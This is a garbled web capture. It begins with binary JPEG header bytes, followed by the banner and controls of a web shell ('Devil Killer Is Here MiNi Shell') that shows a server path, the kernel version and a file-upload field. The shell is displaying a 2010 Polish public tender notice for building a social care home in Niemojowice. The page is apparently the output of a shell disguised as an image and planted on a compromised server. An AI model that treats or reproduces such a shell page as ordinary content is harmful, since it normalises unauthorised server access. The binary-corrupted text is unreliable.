JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20101006/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20101006/321330-N-2010.html

<p class="kh_header"><b>Opoczno: Budowa Domu Pomocy Społecznej wraz z infrastrukturą techniczną  niezbędną do jego funkcjonowania w miejscowości Niemojowice, gm.  Żarnów  (nr  ewid. dz. 258, 259/2, 269, 270)</b><br>
<b>Numer ogłoszenia: 321330 - 2010; data zamieszczenia: 06.10.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Opoczyński reprezentowany przez Zarząd Powiatu Opoczno , ul. Kwiatowa 1a, 26-300 Opoczno, woj. łódzkie, tel. 044 7361500, faks 044 7361500.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.opocznopowiat.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa Domu Pomocy Społecznej wraz z infrastrukturą techniczną  niezbędną do jego funkcjonowania w miejscowości Niemojowice, gm.  Żarnów  (nr  ewid. dz. 258, 259/2, 269, 270).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> roboty budowlane o wartości poniżej 4 845 000  euro.
1. Przedmiotem zamówienia jest kompleksowa  realizacja  budowy  domu  pomocy  społecznej  wraz  z    infrastrukturą  techniczną  niezbędna  do  jego  prawidłowego  funkcjonowania oraz wyposażeniem pomieszczeń

2.   Powierzchnia terenu  do  zagospodarowania  wynosi    -   1,350 ha, z  czego :
powierzchnia  zabudowy  działki			            -  3353,80 m2   
w  tym:  dom  pomocy  społecznej			            -  3259,90 m2
	 budynek  gospodarczy				            -      89,90 m2
              czerpnia  powietrza		                                      -        4,00 m2
powierzchnia dróg dojazdowych i parkingów, placów	             -  2163,00 m2, 
powierzchnia  dojść pieszych, chodników w patio, schodów,
      podestów  wejściowych  zewn.  i  pochylni     	               -   663,50 m2
powierzchni  działki  biologicznie czynnej  pozostało	               - 7320,00 m2

3.  Obiekty  kubaturowe przewidziane  do  realizacji  w  ramach  planowanej  inwestycji :
Budynek  domu  pomocy  społecznej przeznaczony do zamieszkania dla 99 dorosłych pensjonariuszy zakwaterowanych w  pokojach 1- 2- i 3- osobowych wyposażonych  w  łazienki,  budynek w pełni przystosowany dla potrzeb osób niepełnosprawnych.
Budynek  jednokondygnacyjny mieszczący w  swej  przestrzeni  strefę ogólną administracyjną o  pow.  271,68 m2, strefę socjalną o pow. 109,28m2, strefę gospodarczą o pow. 210,20m2, mieszkalną - 1834,87m2 oraz zespół żywieniowy o pow. 355,15m2, którego zadaniem będzie przygotowywanie oraz wydawanie 4 posiłków dziennie dla 100-150 osób, jak również świadczenie usług gastronomicznych o charakterze okolicznościowym.
            Dane  techniczne  budynku :  kubatura  -  13.900,00 m3,  powierzchnia  użytkowa -  2.781,20 m2,  powierzchnia zabudowy	-  3.285,00 m2
            Posadowienie  budynku  na  ławach  i  stopach  fundamentowych  żelbetowych  mono-    litycznych,  ściany  fundamentowe  żelbetowe  monolityczne,  konstrukcja  ścian  nadziemia  murowana  z  pustaków  gazobetonowych  na  zaprawie  cienkowarstwowej,  ponad  to  ściany  zewnętrzne   docieplone  warstwą  styropianu  +  tynk  cienkowarstwowy  silikonowy.  Stropy  w części  z  płyt  prefabrykowanych  kanałowych o wys. 24,5 cm oraz płyt  sprężonych  o  wys.  26,5 cm  z  uzupełnieniem  wylewkami mono-litycznymi, słupy, podciągi i nadproża - monolityczne żelbetowe. Przykrycie budynku stanowi  dach  wielospadowy  o  konstrukcji  drewnianej,  pokrycie  - blacho dachówka powlekana  oraz  na  części  papa  termozgrzewalna  modyfikowana  SBS.  Stolarka okienna - z profili PCV szklona szybą jednokomorową zespoloną,  drzwi  zewnętrzne  i  wewnętrzne na ciągach komunikacyjnych z profili PCV szklone  szybą  bezpieczną, drzwi  wewnątrzlokalowe  do  pomieszczeń  -  drewniane  płytowe  w  okleinie  drewnopodobnej. Wykończenie  wewnętrzne  pomieszczeń -  sufity  podwieszone na  korytarzach  oraz  w  pom. strefy  administracyjnej,  socjalnej,  żywieniowej i  jadalni w  pozostałych  pomieszczeniach   -  tynki  wewnętrzne  sufitów  i  ścian  cem.-  wap.  + gładź  gipsowa,  malowanie  farbami  wodorozcieńczalnymi  na  bazie  żywicy akrylowej w kolorach pastelowych, sufity na biało. Posadzki  -  wykładziny  rulonowe PCV  oraz  płytki  ceramiczne.  Budynek  wyposażony  w  wewnętrzne  instalacje :  wod.-kan.,  c.o.  i  c.t.,  wentylacji mechanicznej,  oraz  instalacji  elektrycznej,  telefonicznej,  TV-SAT,  sygnalizacji przyzywowej, sygnalizacji  pożaru,  oświetlenia  ewakuacyjnego  i  kierunkowego instalacji  odgromowej.      
Budynek  gospodarczy-  parterowy,  niepodpiwniczony  o  konstrukcji  murowanej  ścian  z  gazobetonu  posadowionych  na  ławach  fundamentowych  monolitycznych  żelbetowych.  Budynek  przykryty  dachem  dwuspadowym o konstrukcji  drewnianej (wiązary deskowe), pokrycie blacho dachówką  powlekaną. Wrota  do  pomieszczeń  garażowych  -  segmentowe  ocieplane,  drzwi  zewnętrzne  stalowe,  okna  z  profili  PCV. Wykończenie pomieszczeń  -  tyki  ścian  cem.-wap.,  okładzina  z  płytek  ceramicznych,  malowanie - farbami wodorozcieńczalnymi  odpornymi  na   zabrudzenie,  posadzki  -  na  gruncie  betonowe  +  płytki  ceramiczne  gres.      
            Dane  techniczne  budynku: kubatura - 385,00 m3, powierzchnia  użytkowa - 61,30 m2  powierzchnia zabudowy  -  89,90 m2.  Budynek  wyposażony  w  instalacje  wewnętrzne :  wod. - kan.  i  elektryczną.
Obiekt  małej  architektury  -  czerpnia  powietrza

4.  Przyłącza  infrastruktury  technicznej:
przyłącze wodociągowe wraz z hydrantami  p.poż do zewnętrznego  gaszenia  pożaru,
przyłącze  kanalizacji  sanitarnej,
kanalizacja  deszczowa  wraz  z  systemem  odprowadzenia  wód  do  ziemi,  
przyłącze  energetyczne  wewnętrzne  (od  WLZ  do  budynku),
oświetlenie  zewnętrzne  terenu.  

5.  Obiekty  zagospodarowania  terenu:
ogrodzenie  terenu  wraz  ze  ścianą  oporową ,
zjazdy  z  drogi  publicznej, 
drogi wewnętrzne dojazdowe,  miejsca  postojowe i parkingi,  chodniki  dla  pieszych, 
zagospodarowanie  terenów  zielonych.
6. Szczegółowy opis przedmiotu zamówienia 
	Załącznik nr 8 do SIWZ Dokumentacja budowlana w tym:
Projekt budowlany z projektem zagospodarowania terenu
Projekt budowlany i wykonawczy technologii kuchni i pralni
Projekt budowlany i wykonawczy technologii budynku DPS
Projekt budowlany instalacji elektrycznych wewnętrznych i oświetlenie terenu
Projekt budowlany i wykonawczy ogrodzenia
Projekt  budowlany i wykonawczy zieleni
Operat wodno prawny na wykonanie systemu odprowadzającego oczyszczone ścieki deszczowe
Projekt budowlany i wykonawczy dróg i parkingów
Projekt budowlany i wykonawczy przyłączy wod-kan.
Projekt budowlany i wykonawczy kanalizacji deszczowej
Projekt budowlany i wykonawczy w/z od układu pomiarowego do tablicy głównej
Dokumentacja geotechniczna
	
	Załącznik nr  9 do SIWZ  Specyfikacja Techniczna Wykonania i Odbioru Robót w częściach:
a)	Specyfikacja techniczna wykonania i odbioru robót budowlanych
b)	Specyfikacja techniczna wykonania i odbioru robót drogowych

Załącznik nr 10 do SIWZ  Przedmiary Robót  w częściach: 
	Część A -  Roboty budowlane 
	Część B -  Wyposażenie budynku
	Część C -  Wyposażenie kuchni i pralni
	Część D -  Ogrodzenie 
	Część E -  Przyłącze wodociągowe i kanalizacyjne 
	Część F -  Kan. deszcz. ze zbiornikiem rozsączającym  
	Część G -  Instalacje elektryczne wlz
	Część H -  Wewnętrzna instalacja wod-kan
	Część I -   Instalacja c.o. i c.t.
	Część J -  Wentylacja mechaniczna 
	Część K - Technologia kotłowni olejowej 
	Część L -  Instalacje elektryczne wewnętrzne
	Część M - Instalacja p.poż 
	Część N - System ochrony i sygnalizacji antywłamaniowej 
	Część O - System alarmowo - przyzywowy 
	Część P -  Instalacje oświetlenia terenu
	Część R -  Branża drogowa
Część S -  Zagospodarowanie terenów zielonych
	Uwaga:
	W przypadku gdy treść Projektów budowlanych będzie nie wystarczająca do zapoznania się z przedmiotem zamówienia, Wykonawca może zwrócić się do Zamawiającego o udostępnienie Projektów wykonawczych na nośniku elektronicznym.

	7.  Zamawiający nie dopuszcza składania ofert częściowych.
	
8.  Wykonawca  może powierzyć wykonanie zamówienia podwykonawcom..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje udzielenie zamówień uzupełniających, stanowiących nie więcej niż 10 % wartości zamówienia podstawowego.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.11.12.00-0, 45.26.23.00-4, 45.26.25.00-6, 45.26.12.10-9, 45.30.00.00-0, 45.31.00.00-3, 45.40.00.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 20.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wykonawca jest zobowiązany do wniesienia wadium w wysokości 200.000,00 zł brutto.
2.	Wadium musi być wniesione przed upływem terminu składania ofert w następujących formach, w zależności od wyboru Wykonawcy:
a/ pieniądzu, przelewem na rachunek bankowy: Bank Spółdzielczy Ziemi Piotrkowskiej Oddział w Paradyżu Filia w Opocznie  Nr  94 8973 0003 0020 0376 2910 0021
b/ poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c/gwarancjach bankowych
d/gwarancjach ubezpieczeniowych;
e/poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz.U. Nr 109, poz. 1158, póź. zm.).
Za termin wniesienia wadium w pieniądzu uznaje się termin wpłynięcia na rachunek Zamawiającego.
3.	Wadium wnoszone w formie poręczeń lub gwarancji musi być złożone w oryginale, i musi obejmować cały okres związania ofertą. Wykonawca winien złożyć oryginał gwarancji lub poręczenia w biurze podawczym w siedzibie Zamawiającego przed terminem składania ofert, a do oferty dołączyć kserokopię poświadczoną za zgodność z oryginałem. 
4. Wykonawca, który nie wniesie wadium w wysokości określonej w pkt. 1, w formie lub formach , o których mowa w pkt. 2 zostanie wykluczony z postępowania.
5.  Zamawiający zwraca wadium wszystkim wykonawcom  niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnienia postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana z zastrzeżeniem pkt. 10
6. Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego oraz wniesienia zabezpieczenia należytego wykonania umowy, jeżeli jego wniesienia żądano.
7. Zamawiający zwraca niezwłocznie wadium, na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
8. Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie pkt. 5, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego. 
9. Jeżeli wadium wniesiono w pieniądzu, Zamawiający zwróci je wraz z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez Wykonawcę.
10. Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Pzp, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1 lub pełnomocnictw, chyba, że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
11. Wykonawca, którego oferta zostanie wybrana utraci wadium wraz z odsetkami na rzecz zamawiającego w przypadku, gdy: 
a/	odmówi podpisania umowy w sprawie niniejszego zamówienia na warunkach określonych w ofercie
b/	nie wniesie wymaganego zabezpieczenia należytego wykonania umowy;
c/	zawarcie umowy w sprawie niniejszego zamówienia stanie się niemożliwe z przyczyn leżących po stronie Wykonawcy.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że zrealizował (rozpoczął i zakończył) w okresie ostatnich 5 lat przed wszczęciem postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy- w tym okresie, co najmniej 2 zadania w tym:
- 1 zadanie o wartości nie mniejszej niż  2,0 mln  PLN .
- 1 zadanie o wartości nie mniejszej niż  5,0 mln  PLN .
odpowiadające swoim rodzajem przedmiotowi niniejszego przetargu (tzn. realizacja obiektu użyteczności publicznej).

Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu o udzielenie zamówienia publicznego zostanie dokonana zgodnie z formułą spełnia  nie spełnia wymagany warunek w oparciu o informacje zawarte w wymaganych dokumentach i oświadczeniach, o których mowa w rozdziale VI specyfikacji.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca dysponuje lub będzie dysponował osobami, które będą uczestniczyć w wykonywaniu zamówienia, legitymującymi się doświadczeniem zawodowym odpowiednim do funkcji, jakie zostaną im powierzone t.j:
a) kierownika budowy w zakresie robót budowlanych, wymagane uprawnienia do kierowania robotami budowlanymi w specjalności  konstrukcyjno-budowlanej - minimalne doświadczenie jako kierownik robót 5  lat. 
b) kierownika robót sanitarnych  - wymagane uprawnienia do kierowania robotami w specjalności instalacyjnej w zakresie sieci i urzadzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych - minimalne doświadczenie 3 lata. 
c)    kierownika robót elektrycznych  - wymagane uprawnienia do kierowania robotami w specjalności instalacyjnej w zakresie instalacji i urządzeń elektrycznych    - minimalne doświadczenie 3 lata.
d)   kierownika robót drogowych  - wymagane uprawnienia do kierowania robotami drogowymi - minimalne doświadczenie 3 lata.
Przez minimalne doświadczenie jako kierownik dla stanowisk, dla których wymagane są uprawnienia budowlane, rozumie się lata czynne zawodowo od daty uzyskania uprawnień budowlanych oraz lata przepracowane na odpowiednich stanowiskach kierowniczych (kierownika lub z-cy kierownika budowy/robót zgodnie z ustawą Prawo Budowlane). 
Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu o udzielenie zamówienia publicznego zostanie dokonana zgodnie z formułą spełnia  nie spełnia wymagany warunek w oparciu o informacje zawarte w wymaganych dokumentach i oświadczeniach, o których mowa w rozdziale VI specyfikacji.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca musi wykazać, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia poprzez:
- Informacje z banku lub spółdzielczej kasy oszczędnościowo - kredytowej, w których posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, na kwotę co najmniej 3.000.000,00 zł  wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.
- opłacona polisa, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia, na wartość nie mniejszą niż 2 mln PLN.

Ocena spełnienia przez Wykonawców warunków udziału w postępowaniu o udzielenie zamówienia publicznego zostanie dokonana zgodnie z formułą spełnia  nie spełnia wymagany warunek w oparciu o informacje zawarte w wymaganych dokumentach i oświadczeniach, o których mowa w rozdziale VI specyfikacji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.	Informacje zawarte we wzorze umowy - wg załącznika Nr 6 do SIWZ.
